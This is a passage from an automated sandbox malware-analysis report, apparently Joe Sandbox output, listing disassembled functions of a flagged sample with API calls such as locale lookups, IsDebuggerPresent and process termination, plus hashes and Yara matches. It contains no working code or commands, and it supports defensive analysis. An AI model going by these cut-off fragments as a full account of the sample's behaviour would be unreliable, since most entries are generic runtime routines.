                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: 11@$GetLocaleInfoEx
                                                                                    • API String ID: 2299586839-1075713910
                                                                                    • Opcode ID: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                                                    • Instruction ID: 0b6d0ab79e82c81e80324b5502c8e0aaa0a052425b201476cea76cb6f5b2798d
                                                                                    • Opcode Fuzzy Hash: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                                                    • Instruction Fuzzy Hash: 10F0BB31680318BBDB11AF51DC02F6F7B65EF19B12F10416BFC0566290DA759D20EA9E
                                                                                    Function 0043B415 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B469
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B4BA
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B57A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorInfoLastLocale$_free
                                                                                    • String ID:
                                                                                    • API String ID: 2834031935-0
                                                                                    • Opcode ID: 2b4fd7bd63b1ca4c86b7cdb97710403681583749ada0fe7a45d93d6fdc0ff965
                                                                                    • Instruction ID: c275762dc3584603e4449795e293da263c651eeb99c2a8a82852c084b1b0f28d
                                                                                    • Opcode Fuzzy Hash: 2b4fd7bd63b1ca4c86b7cdb97710403681583749ada0fe7a45d93d6fdc0ff965
                                                                                    • Instruction Fuzzy Hash: CA61B271900617AFDB289F25CC82BBA77A8EF18314F20517BEE05C6681E73DD951CB98
                                                                                    Function 0042A3F3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4EB
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4F5
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A502
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
                                                                                    • Instruction ID: 9c884317c51d85a4b2a5569c8d07c46b6125cba9f3fa022ce0985413e040e42f
                                                                                    • Opcode Fuzzy Hash: 3214526669c2ecc0a7e52ca6451879e06077fde6cd46758ec137b78cfee515f1
                                                                                    • Instruction Fuzzy Hash: 6D31D474901228ABCB21DF24D8887DDBBB8BF08710F5041EAE81CA7251EB749F958F49
                                                                                    Function 00A0A65A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,009EDAFC), ref: 00A0A752
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,009EDAFC), ref: 00A0A75C
                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,009EDAFC), ref: 00A0A769
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                    • Instruction ID: e4c0428d7635a68188f57da373b77a0e0346b724ad2cfa1193f0d45fb54f317b
                                                                                    • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                    • Instruction Fuzzy Hash: C831C47490131CABCB21DF64D98979CBBB8BF58710F5081EAE81CA7291E7709F858F45
                                                                                    Function 0042FE7F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA0
                                                                                    • TerminateProcess.KERNEL32(00000000,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000,?,0042DFDF,00000003), ref: 0042FEA7
                                                                                    • ExitProcess.KERNEL32 ref: 0042FEB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                    • Instruction ID: f37ed9c2097ef164d49cac6b9283d1ec131115afdbcb09f205e89e36e121774d
                                                                                    • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                    • Instruction Fuzzy Hash: BCE08C31100158AFCF126F50EE08A4A3B39FF46B56F810439F9068B236CB39EE42CB48
                                                                                    Function 00A100E6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00A100BC,00000000,00457970,0000000C,00A10213,00000000,00000002,00000000), ref: 00A10107
                                                                                    • TerminateProcess.KERNEL32(00000000,?,00A100BC,00000000,00457970,0000000C,00A10213,00000000,00000002,00000000), ref: 00A1010E
                                                                                    • ExitProcess.KERNEL32 ref: 00A10120
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                    • Instruction ID: 804c5c830a48e531b4b9582118977acf6c9d543e0dfc80ceb9cf1fbbc92dc3a8
                                                                                    • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                    • Instruction Fuzzy Hash: F9E0B635000548ABCF15AFA4DE0AE993B69FB56F42B004524F9058B162CB79DEC2CA94
                                                                                    Function 009E092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .$GetProcAddress.$l
                                                                                    • API String ID: 0-2784972518
                                                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                    • Instruction ID: e7df28c795b5d5d6bb707880e7510df8e26bbd12ea004c9f38b556de3a969cf7
                                                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                    • Instruction Fuzzy Hash: 7B315CB6900649DFDB11CF99C880AADBBF9FF48324F14404AD441A7352D7B5EA85CBA4
                                                                                    Function 00A15447 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00A1049A,?,00000004), ref: 00A1549A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2299586839-1785270423
                                                                                    • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                    • Instruction ID: d8b66797bd0f4208bb5f1d8e02ef3581b5e4a0b80a55dae2bf66a65f507165d5
                                                                                    • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                    • Instruction Fuzzy Hash: 92F02B31A40718FFDB016F70CD02FAE7B61EF44B12F544155FD1667190DA718D60A6C9
                                                                                    Function 0042EB00 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cda9e72bc25da6b1635b523c299a5fa0de5a927ba93022b621906e7d80f750db
                                                                                    • Instruction ID: 4ac827831b60bfe85137482c2a27181e9cc595fbcc224352d04797812a560731
                                                                                    • Opcode Fuzzy Hash: cda9e72bc25da6b1635b523c299a5fa0de5a927ba93022b621906e7d80f750db
                                                                                    • Instruction Fuzzy Hash: 74024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AE819E7384D734AD41CB84
                                                                                    Function 00A0ED67 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
                                                                                    • Instruction ID: a9c5759ae7df61b92ed43cdc8cad9b88bb8c7c8cbfc9b480f007d5bf29068af0
                                                                                    • Opcode Fuzzy Hash: 50f1f6500ce61f8077431c98347a8527c5f1f934838e9231b30eeddca4b7b1fa
                                                                                    • Instruction Fuzzy Hash: DF023C71E002199FDF24CFA9D9806ADF7F1EF88314F25826AD919E7281E731AD41CB90
                                                                                    Function 009E2621 Relevance: 3.1, APIs: 2, Instructions: 129nativewindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 009E2648
                                                                                    • PostQuitMessage.USER32(00000000), ref: 009E27EA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessageNtdllPostProc_QuitWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4264772764-0
                                                                                    • Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                                                    • Instruction ID: e049ece38686cd5f012b6d55a88741c48c64a2ce6ebc2524d92b378b655317d0
                                                                                    • Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                                                    • Instruction Fuzzy Hash: 33410F15A6438494E731EFA5FC15B2527B4FF64762F10253BE528CB2B2E3A28940C30E
                                                                                    Function 00436CDF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CDA,?,?,00000008,?,?,0043F19B,00000000), ref: 00436F0C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                    • Instruction ID: 56894988d221dc275bbeb5d863802b50bab2a0c2ec5e1dae9116b4c396cbcd5f
                                                                                    • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                    • Instruction Fuzzy Hash: 58B15D3521060AAFD715CF28C48AB657BE0FF09364F26D659E899CF3A1C339D992CB44
                                                                                    Function 00A16F46 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A16F41,?,?,00000008,?,?,00A1F402,00000000), ref: 00A17173
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                    • Instruction ID: 1798efd3142175a1448d14991ff4714eec63c2592f28ee05d3f7335a42c4ffe5
                                                                                    • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                    • Instruction Fuzzy Hash: BCB16D31614608DFD715CF28C48ABA97BF1FF49364F298658E899CF2A1C335E992CB40
                                                                                    Function 0043B665 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B6B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free$InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2955987475-0
                                                                                    • Opcode ID: f248db6eca06ff892e51bce8bbfaaacfef81b0ccb26f5c1b1a4e2b53f037ebcf
                                                                                    • Instruction ID: b1e829de63a4cfdbbeb590434fbc272015d29a09e68feb3eb70f55beb1ad3412
                                                                                    • Opcode Fuzzy Hash: f248db6eca06ff892e51bce8bbfaaacfef81b0ccb26f5c1b1a4e2b53f037ebcf
                                                                                    • Instruction Fuzzy Hash: 5921B33291020A9BDB249E25CC42BBB73A8EF48314F10217BFE01DA241EB399D45CB99
                                                                                    Function 00A1B8CC Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A121C0
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121CD
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00A1B920
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free$InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2955987475-0
                                                                                    • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                    • Instruction ID: b1efc4a4b77088c1a2b6631d9ec5f20b4c9f7a09ae6ae5eda4b040ddff93a33e
                                                                                    • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                    • Instruction Fuzzy Hash: 5A219F7292021AABDF24AF25DD42BFA73ACEF44710F1401BAEE01C6141EB79DD95CB60
                                                                                    Function 0043B2ED Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,004307D5,?,0043BA42,00000000,?,?,?), ref: 0043B35F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                    • String ID:
                                                                                    • API String ID: 2016158738-0
                                                                                    • Opcode ID: f5690584e9ad499021b42ce56d8f8de17484a935533950cab043c7ceb3897eb3
                                                                                    • Instruction ID: db3c9ccc80d1476fb6d66557201e2f3895761b13365cb69cd331a803ccf2be29
                                                                                    • Opcode Fuzzy Hash: f5690584e9ad499021b42ce56d8f8de17484a935533950cab043c7ceb3897eb3
                                                                                    • Instruction Fuzzy Hash: C911063B6007019FDB189F39C8917BAB791FF88318F15442EEA8687B40D375A902C784
                                                                                    Function 00A1B554 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                    • EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,00A10A3C,?,00A1BCA9,00000000,?,?,?), ref: 00A1B5C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                    • String ID:
                                                                                    • API String ID: 2016158738-0
                                                                                    • Opcode ID: cce71207e2b51a43ae620771f06a8e25d222029b64e0dc1c2990edcd69b9ccff
                                                                                    • Instruction ID: 59295a3ba68af449e533017cd77f7208299d4f28de0bd492644a793c304de992
                                                                                    • Opcode Fuzzy Hash: cce71207e2b51a43ae620771f06a8e25d222029b64e0dc1c2990edcd69b9ccff
                                                                                    • Instruction Fuzzy Hash: 4F1129362107015FDB189F39C9A16BABB92FF84368B14442DEA4787740D371A942C750
                                                                                    Function 0043B895 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B633,00000000,00000000,?), ref: 0043B8C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InfoLocale_free
                                                                                    • String ID:
                                                                                    • API String ID: 787680540-0
                                                                                    • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                    • Instruction ID: cee2b43c6a9fd0cc18a312a7fa4a4d5932635e218f943acbfed5d814f3d68c37
                                                                                    • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                    • Instruction Fuzzy Hash: 79F0F936A00215ABDB2C6A26DC067BB775CEF44754F15442AEE05A3240EB39BE4186D8
                                                                                    Function 00A1BAFC Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00A1B89A,00000000,00000000,?), ref: 00A1BB28
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InfoLocale_free
                                                                                    • String ID:
                                                                                    • API String ID: 787680540-0
                                                                                    • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                    • Instruction ID: 5442b885b4c02470e1df8a713c8f2c1d402f4e423948e1979cdd2507a50e6a9e
                                                                                    • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                    • Instruction Fuzzy Hash: 4FF02D32A2C1157BDB249B24CC45BFB7768EB40754F040429ED06A3584EB70FD81C6E4
                                                                                    Function 0043B388 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • EnumSystemLocalesW.KERNEL32(0043B665,00000001,?,?,004307D5,?,0043BA06,004307D5,?,?,?,?,?,004307D5,?,?), ref: 0043B3D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                    • String ID:
                                                                                    • API String ID: 2016158738-0
                                                                                    • Opcode ID: d6cb40d020c0f10101038f95f210870574939c9cf499dc93c49f7b68341f8f2e
                                                                                    • Instruction ID: 8e36b55a9bc7705faaba13b87098130e4a65547030758f83ed228488c18c5ef1
                                                                                    • Opcode Fuzzy Hash: d6cb40d020c0f10101038f95f210870574939c9cf499dc93c49f7b68341f8f2e
                                                                                    • Instruction Fuzzy Hash: BCF0C2362003045FDB145F3A9C92B6A7B95EF88768F15852EFE468B650D7B59C02C684
                                                                                    Function 00A1B5EF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                    • EnumSystemLocalesW.KERNEL32(0043B665,00000001,?,?,00A10A3C,?,00A1BC6D,00A10A3C,?,?,?,?,?,00A10A3C,?,?), ref: 00A1B63B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                    • String ID:
                                                                                    • API String ID: 2016158738-0
                                                                                    • Opcode ID: 8a71536dd7903a37c32e393faf36bdd1bfe0e15f9a3a0bcd0082b4142840c2ea
                                                                                    • Instruction ID: c4b8315f7969c96f40a3376eb865b3228c68da5ccce4838359f1da998a980da8
                                                                                    • Opcode Fuzzy Hash: 8a71536dd7903a37c32e393faf36bdd1bfe0e15f9a3a0bcd0082b4142840c2ea
                                                                                    • Instruction Fuzzy Hash: AAF046363007045FDB149F39CC81BBA7B91EF80768F15402DFA058B690E7B1DC828714
                                                                                    Function 00434DED Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
